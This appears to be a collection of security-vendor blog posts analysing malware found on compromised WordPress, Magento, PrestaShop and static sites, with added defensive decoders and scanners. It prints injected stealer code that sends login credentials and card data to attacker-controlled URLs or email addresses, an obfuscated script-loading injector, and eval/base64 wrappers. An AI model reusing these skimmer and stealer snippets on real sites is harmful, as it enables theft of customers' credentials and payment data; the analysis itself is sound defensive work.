Malicious routine stealing WordPress credentials in the wild

From the hacker’s perspective, maintaining access to a compromised website for as long as possible is ideal. One way to achieve this goal is by stealing users’ credentials. This method can also give the attacker a chance to spread the attack across other platforms if the user reuses the same password on other services, such as email.

Once the attackers inject the code into the site, they must send the stolen data somewhere. It can either be stored in a local file or sent remotely to an email address or another server.

During an incident response investigation, we identified malicious code of this kind sending the credentials to a remote website controlled by the attacker. This code was very interesting because it didn’t use the usual methods, such as the mail() function or a curl request. Instead, the attackers used file_get_contents().

The following snippet was found inside the wp-login.php file:

...
if ( !is_wp_error($user) && !$reauth ) {
    file_get_contents(base64_decode('aHh4cDovvL2luZm<REMOVED CONTENT>/dXJsPQ==') .$_SERVER['HTTP_HOST'].'&user='.$_POST['log'].'&pwd='.$_POST['pwd']);
    if ( $interim_login ) {
...

The malicious code is just one line long, making it hard for the untrained eye to spot in a complex file like wp-login.php. The base64-encoded string decodes to "hxxp://infected-site.com/getpwd.php?url=", the hacker-controlled site, to which the victim’s hostname, username and password are appended.

wp-login.php is a WordPress core file and should not differ from its original version (unless WordPress ships an official update to it).

Using a File Integrity Monitoring system can help you detect such modifications and take the necessary actions before further damage is done to your website and online presence. We also recommend having a Web Application Firewall in place to prevent brute force and unauthorized access to your back-end interface.

Unwanted Sex Toys Advertisement

Recently, during an incident response process, we found a floating advertisement banner on specific pages of an HTML-based website. Despite what people may think, these websites are also targets of attacks and can be infected.

Unlike other platforms, the entry point in this scenario is easier to detect because of the nature of HTML-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.


The following banner was inadvertently added into the victim’s website and floating through different pages:

After a quick investigation, we found that it was being triggered by the following code:

<script>
(function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)) return;
    js = d.createElement(s);
    js.id = id;
    js.src = "//cdn[.]googletoolservices[.]com/jquery-ui[.]js";
    fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'jquery-uisdk'));
</script>

The code above is just the first stage of the attack. It accesses the website: cdn[.]googletoolservices[.]com/jquery-ui[.]js and fetches the malicious payload, which is obfuscated with JS Packer compression. After deobfuscating it, we get this script:

var x113110_hit;
if (typeof(x113110_hit) == "undefined") {
    (function() {
        var params = {};
        ...
        var args = '';
        for (var i in params) {
            if (args != '') {
                args += '&'
            }
            args += i + '=' + encodeURIComponent(params[i])
        }
        var st = document.createElement('script');
        st.type = 'text/javascript';
        st.async = true;
        st.charset = 'utf-8';
        st.src = '//cdn[.]googletoolservices[.]com/jquery[.]js?' + args;
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(st, s);
        x113110_hit = true
    })()
}

That second stage renders the image-based floating banner, which leads to an adult toys website when clicked (hxxp://www.la-pareja.com/?qn).

This malware may be injected into several pages of the website but not necessarily all of them, so it’s important to check every HTML page for that particular code, and more specifically for the link ‘cdn[.]googletoolservices[.]com/jquery-ui[.]js’.
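As an added example (not code from the original post), the check recommended above can be automated. The script below inventories every external script host referenced by a page, covering both static <script src> tags and dynamic loaders that assign .src the way the injector does, and reports any host missing from an allow-list, so it also catches a renamed domain. The fixture HTML and the hosts in it are constructed placeholders.

```python
import re
from pathlib import Path
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed fixture (not the compromised site's real HTML): one local script, one
# first-party CDN script, and a loader shaped like the injector pointing at a placeholder host.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script>
(function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    js = d.createElement(s); js.id = id;
    js.src = "//cdn.placeholder-injector.invalid/jquery-ui.js";
    fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'jquery-uisdk'));
</script></html>"""

# Hosts this site is expected to load scripts from; everything else is reported for review.
ALLOWED_HOSTS = {"cdn.example.com"}

# Static <script src=...> tags and dynamic loaders that assign .src inside inline scripts.
SRC_RE = re.compile(r"""(?:<script[^>]*\ssrc\s*=\s*|\.src\s*=\s*)["']([^"']+)["']""", re.I)

def external_script_hosts(html: str) -> Dict[str, List[str]]:
    """Map each external host to the script URLs loaded from it. Protocol-relative
    '//host/path' URLs (as used by the injector) are resolved as a browser would."""
    hosts: Dict[str, List[str]] = {}
    for url in SRC_RE.findall(html):
        if url.startswith("//"):
            url = "https:" + url
        host = urlsplit(url).hostname
        if host:  # site-relative paths such as /js/site.js have no host and are skipped
            hosts.setdefault(host, []).append(url)
    return hosts

def suspicious_scripts(html: str, allowed=ALLOWED_HOSTS) -> Dict[str, List[str]]:
    """Only the hosts that are not on the allow-list."""
    return {h: u for h, u in external_script_hosts(html).items() if h not in allowed}

def scan_directory(root: str) -> Dict[str, Dict[str, List[str]]]:
    """Run suspicious_scripts over every .html/.htm file below root: {file: findings}."""
    results = {}
    for path in Path(root).rglob("*.htm*"):
        found = suspicious_scripts(path.read_text(errors="replace"))
        if found:
            results[str(path)] = found
    return results
```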

If you’re experiencing similar issues in your website and want it to be cleaned up, let us know.

New version of Magento Credit Card stealer in...

Recently we found another variant of malware that intercepts credit card data, injected into the PayPal payment method file “app/code/core/Mage/Paypal/Model/Direct.php”.


$setXBodyText = 'First name : '.trim($order->getBillingAddress()->getFirstname()).'<br>';
$setXBodyText .= 'Last name : '.trim($order->getBillingAddress()->getLastname()).'<br>';
$setXBodyText .= 'Address : '.trim($order->getBillingAddress()->getStreet(1)).'<br>';
$setXBodyText .= 'Address2 : '.trim($order->getBillingAddress()->getStreet(2)).'<br>';
$setXBodyText .= 'City : '.trim($order->getBillingAddress()->getCity()).'<br>';
$setXBodyText .= 'Phone : '.trim($order->getBillingAddress()->getTelephone()).'<br>';
$setXBodyText .= 'Country : '.trim($order->getBillingAddress()->getCountry()).'<br>';
$setXBodyText .= 'State : '.trim($order->getBillingAddress()->getRegion()).'<br>';
$setXBodyText .= 'Zipcode : '.trim($order->getBillingAddress()->getPostcode()).'<br>';
$setXBodyText .= 'Email : '.trim($order->getBillingAddress()->getEmail()).'<br>';
if($payment->getCcOwner()){
    $setXBodyText .= 'name on card : '.trim($payment->getCcOwner()).'<br>';
}
$setXBodyText .= 'Credit Card Type : '.trim($payment->getCcType()).'<br>';
$setXBodyText .= 'Card number : '.trim($payment->getCcNumber()).'<br>';
$setXBodyText .= 'Exp date : '.trim($payment->getCcExpMonth()).trim($payment->getCcExpYear()).'<br>';
$setXBodyText .= 'CVV2 : '.trim($payment->getCcCid());
$setXBodyTextEncripted = @eval(gzinflate(base64_decode(str_rot13(strrev('=RDe0b0XFAxXGWCavf0<CONTENT REMOVED>F2mPlW7DYX9FlhxjH')))));

Decoding that last part, we see that all the stolen information is sent to a Gmail account:

$StoresThisName = $_SERVER['SERVER_NAME'];
mail('g<CONTENT REMOVED>a@gmail.com', "Authorize Direct $StoresThisName", $setXBodyText);

When checking the e-mail against our malware samples database, we identified that this is not the first time it is used to receive stolen information from e-commerce solutions.

The following sample is another injection technique used by the same attacker (or group, judging by the e-mail address). This time they targeted the onepage checkout module to inject the code (app/code/core/Mage/Checkout/Model/Type/Onepage.php):

eval(gzinflate(base64_decode(str_rot13(strrev('=8j52gl334pv3DXrlwgB2LcqOBIFIxlFS<CONTENT REMOVED>VrIdKNIPFHIRjq6zinVRjbgwoKMa')))));

This is what we get after decoding it:

$what = '---------------------';
$send = array(
    'Payment Method' => $data['method'],
    'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(),
    'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(),
    'Billing Address 1' => $this->getQuote()->getBillingAddress()->getStreet(1),
    'Billing Address 2' => $this->getQuote()->getBillingAddress()->getStreet(2),
    'Billing City' => $this->getQuote()->getBillingAddress()->getCity(),
    'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(),
    'Billing PostCode' => $this->getQuote()->getBillingAddress()->getPostcode(),
    'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(),
    'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(),
    'Billing Tax' => $this->getQuote()->getBillingAddress()->getTaxvat() or "NULL",
    'CC Owner' => $data['cc_owner'],
    'CC Type' => $data['cc_type'],
    'CC Number' => $data['cc_number'],
    'CC Start' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))),
    'CC Expired' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))),
    'CC Sec' => $data['cc_cid'],
    'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "NULL",
    'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "NULL",
    'Account Password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "NULL",
    'IP Address' => trim(getenv('REMOTE_ADDR')),
    'Web Store' => trim($_SERVER['SERVER_NAME'])
);
$numb = trim($data['cc_number']);
$mail = trim($this->getQuote()->getBillingAddress()->getEmail());
if($numb != NULL) $what = "$numb - Payment Report";
else $what = "Payment Report - $mail";
foreach ($send as $param => $value) {
    $send .= "$param = $value\r\n";
}
$data .= @substr($send, 5, -1);
@mail('g<CONTENT REMOVED>a@gmail.com', $what, $data);
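The decoding step above can be done without ever running the wrapped code. The following is an added example (not the attackers' code and not Sucuri's tooling): it parses the eval(gzinflate(base64_decode(str_rot13(strrev('...'))))) wrapper, applies the inverse of each layer in the order PHP would evaluate them, and also handles the shorter eval(gzinflate(base64_decode(...))) form seen in the PrestaShop sample later on this page. wrap_for_test() only builds a benign, constructed fixture in the same shape so the decoder can be exercised offline.

```python
import base64
import codecs
import re
import zlib

# eval( f1( f2( ... ( 'literal' ) ... ) ) ): capture the function chain and the quoted literal.
CHAIN_RE = re.compile(r"@?eval\(((?:\s*\w+\s*\()+)\s*(['\"])(.*?)\2\s*\)+", re.S)

def _gzinflate(data: bytes) -> bytes:
    # PHP gzinflate() reads raw DEFLATE with no zlib header, hence wbits = -15.
    return zlib.decompress(data, -15)

# Inverse of each PHP layer seen in the samples. rot13 and strrev are their own inverse.
LAYERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
    "gzinflate": _gzinflate,
}

def decode_eval_chain(php: str) -> str:
    """Locate an eval() wrapper in PHP source and return the hidden code without running it."""
    m = CHAIN_RE.search(php)
    if not m:
        raise ValueError("no eval() wrapper found")
    funcs = re.findall(r"\w+", m.group(1))  # outermost first, e.g. gzinflate, base64_decode, ...
    data = m.group(3).encode("latin-1")
    for name in reversed(funcs):  # PHP evaluates the innermost call first
        if name not in LAYERS:
            raise ValueError(f"unsupported layer: {name}")
        data = LAYERS[name](data)
    return data.decode("latin-1")

def wrap_for_test(code: str, rot_and_rev: bool = True) -> str:
    """Build a constructed fixture in the shape of the samples above (benign code, not malware)
    so the decoder can be exercised offline. rot_and_rev=False gives the two-layer variant."""
    comp = zlib.compressobj(wbits=-15)  # raw DEFLATE, as PHP gzdeflate() produces
    blob = base64.b64encode(comp.compress(code.encode()) + comp.flush()).decode()
    if rot_and_rev:
        inner = codecs.encode(blob, "rot13")[::-1]
        return f"eval(gzinflate(base64_decode(str_rot13(strrev('{inner}')))));"
    return f"eval(gzinflate(base64_decode('{blob}')));"
```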

Hacking into Magento sites and injecting code to steal payment information is very profitable, and it’s the biggest trend we are seeing in 2016. It is also interesting to note that the same group is responsible for several attacks.

It can never be stressed enough that you should keep your site secure and ensure that all data sent to your website is protected at all times, especially if you process payments, as e-commerce solutions usually do.

WordPress Theme Mailing Script being exploited in the...

A few weeks ago, we posted a lab note describing a legitimate theme file being exploited by attackers to send mass-mailing SPAM (https://labs.sucuri.net/?note=2016/08/15 0:00). Upon further investigation, we identified that attackers have been exploiting this issue for quite a while, apparently under the radar.

The lack of security checks in that particular file allows attackers to send as many emails as they like, limited only by the server’s configuration. To make matters worse, the code had been reused across different themes developed by the same company.

The issue is located within the file ‘functions/theme-mail.php’ and can be found in older versions of the following premium themes:

bretheon, doover, fingerprints, kora, lawcenter_two, mfl, pindol, tisson, almet, caffeine, nollie, limuso

The consequences of using those old versions vary, from having your website suspended by the hosting company to getting the mail server blacklisted.

We didn’t have access to all versions of those themes to determine when a patch was applied, but if you find the same snippet we described in the Sucuri Labs note, we highly recommend adding the following code right after the opening PHP tag to block direct access to the file and prevent further exploitation:

if ( basename($_SERVER['PHP_SELF']) == basename(__FILE__) ) {
    die('Access Denied');
}

If you’re a customer on the Sucuri Firewall you are already patched via our virtual patching engine.

PrestaShop Login Stealer

Lately, we’ve noticed an increase in credential-stealing attempts and techniques targeting e-commerce websites. These websites usually hold sensitive information (credit card and back-end credentials) that allows attackers to profit from both the data and the infected website.

This post uncovers a different technique being used against PrestaShop installations. It differs from the one we described in a previous blog post.

In this case, the attackers also used the ‘./controllers/admin/AdminLoginController.php’ file, but injected different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:


<?php
if(function_exists("mail")){
    $listo = array(
        'eNyong' => 'a<removed>@<removed>mail.com',
        'Dowoh' => 'm<removed>l@<removed>mail.com'
    );
    foreach($listo as $ming => $imel){
        mail($imel, 'Setoran Admin '.$_SERVER['HTTPHOST'].' ^^', "Kye Pak $ming,\n\nNama: ".$employee->firstname." ".$employee->lastname."\nEmail: $email\nPassword: $passwd");
    }
}else{
    $f=fopen('uspas.txt','a');
    fwrite($f,"imel:$email | pass: $passwd\n");
    fclose($f);
}
?>

The attackers used an interesting conditional statement that gives them the information they are after regardless of server limitations. In other words, they check whether the server can send mail: if it can, all the sensitive data is mailed to a specific address, and if it can’t, the code simply writes a file called ‘uspas.txt’ on the system containing the username and password.

From there, the attackers can simply choose between checking the e-mail or accessing the .txt file on the victim’s website.

In case of a compromise, we should assume that all user accounts and their personal information were stolen; therefore, it’s recommended to change all passwords for the back-end, cPanel, SFTP and any other connection mechanism that could give attackers leverage.

A business’s reputation can be damaged if sensitive information or customers’ credit card data falls into the wrong hands, so keeping good security practices, such as File Integrity Monitoring, a Web Application Firewall and other measures, will help reduce the risk of infection.

Magento Login credentials stealer

While investigating a compromised Magento-based e-commerce website, we found malicious code that is being used to steal credentials and maintain unauthorized access to user accounts.

This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file, and it posts the stolen credentials to a malicious URL every time a user tries to log into their own account:

$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password,$user->getEmail(),Mage::helper('core/url')->getCurrentUrl())));
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
$output = curl_exec($ch);
curl_close($ch);

The above malicious code posts the stolen username and password to the URL hidden in this part of the code: base64_decode(REMOVED MALICIOUS CODE)

That argument is a base64-encoded string, which in this case decoded to the following malicious URL:

http://infected-site.com/404.php
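As an added example (not code from the original posts), the heuristic below is a triage aid for the samples on this page: the WordPress file_get_contents() exfil, the PrestaShop mail()/fwrite() fallback, and the Magento curl POST shown above. It splits PHP into statements and flags any exfil sink that has a credential or card-data source in the same statement or in the few statements before it, which is how the curl variant separates the two. The SAMPLE_PHP fixture and its PLACEHOLDER_B64 literal are constructed. Treat hits as leads to confirm against a known-good copy of the file; this does not replace File Integrity Monitoring.

```python
import re
from typing import Dict, List

# Data the injected code in these samples reads: login form fields, password variables, card fields.
SOURCES = [r"\$_POST\['(?:log|pwd)'\]", r"\$passw(?:or)?d\b", r"getCc(?:Number|Cid)\(\)", r"\['cc_(?:number|cid)'\]"]
# Where it sends that data: an outbound request, an e-mail, or a local drop file.
SINKS = [r"\bfile_get_contents\(", r"\bcurl_setopt\(", r"\bmail\(", r"\bfwrite\("]
# Wrappers used to hide the destination or the code itself.
OBFUSCATION = [r"\bbase64_decode\(", r"\bgzinflate\(", r"\bstr_rot13\(", r"\bstrrev\(", r"\beval\("]

# Constructed fixture (not the page's real samples): one legitimate core statement, a WordPress-style
# file_get_contents() exfil, and a Magento-style exfil whose source and curl sink are separate statements.
SAMPLE_PHP = r"""<?php
$user = wp_signon(array(), $secure_cookie);
file_get_contents(base64_decode('PLACEHOLDER_B64').$_SERVER['HTTP_HOST'].'&user='.$_POST['log'].'&pwd='.$_POST['pwd']);
$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password)));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode('PLACEHOLDER_B64'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
"""

def _matches(patterns: List[str], text: str) -> List[str]:
    found = [re.search(p, text) for p in patterns]
    return [m.group(0) for m in found if m]

def split_statements(php: str) -> List[tuple]:
    """(line_no, statement) pairs, split naively on ; { }. A ';' inside a string only
    splits a statement early, which makes the look-back window slightly wider."""
    out = []
    for m in re.finditer(r"[^;{}]+", php):
        stmt = m.group(0)
        first = m.start() + len(stmt) - len(stmt.lstrip())  # offset of first non-blank char
        if stmt.strip():
            out.append((php.count("\n", 0, first) + 1, stmt.strip()))
    return out

def scan_php(php: str, window: int = 6) -> List[Dict]:
    """Flag every sink statement that has a credential/card source in the same
    statement or in the `window` statements before it."""
    stmts = split_statements(php)
    findings = []
    for i, (line, stmt) in enumerate(stmts):
        sinks = _matches(SINKS, stmt)
        if not sinks:
            continue
        text = ";".join(s for _, s in stmts[max(0, i - window): i + 1])
        sources = _matches(SOURCES, text)
        if sources:
            findings.append({"line": line, "sink": sinks[0], "sources": sources,
                             "obfuscation": _matches(OBFUSCATION, text)})
    return findings
```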

Customer personal information (including full name, email address and physical address, and possibly any stored credit card and payment details) should be considered compromised and leaked.

The hacker may also redirect payments to their own PayPal account or any other payment gateway to steal money, as long as they have full control over the administration panel of the Magento website.

Such attacks can have a severe negative impact on your business reputation and your customers’ trust.

It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.

It’s time now to secure your website from hackers!

Malicious Redirections on Disabled Sites

It’s quite common for attackers to compromise your website and use it for their phishing campaigns. The most typical methods are to place redirects throughout your site or to upload entire phishing folders, so that your website becomes an actual phishing platform.

When the hosting company finds bad content, they usually take the swiftest action and suspend your service until the matter is resolved. But what if the compromise started at a different level, say, the server’s error documents?


Recently, we came across just such a situation. The curious point is that the attackers predicted the domains would eventually be suspended, so they promptly changed the template for suspended websites directly through the WHM panel.

Even though the website was suspended and its content inaccessible, infecting the suspended-site template kept the redirect to the phishing domain working.

These phishing campaigns directly impact a website’s reputation and can easily lead to blacklisting and big drops in SEO rankings.

Website suspension is not always enough to fix issues resulting from a compromise, especially when the compromise happens directly at your hosting provider and the attacker has access to your cPanel / WHM.

Once a compromise is detected, we always recommend changing all passwords (database, back-end interfaces, cPanel, FTP/SFTP), keeping regular backups so the website can be restored to a clean state, and reducing the impact on your business by adding a File Integrity Monitoring system and a Website Firewall to prevent attacks.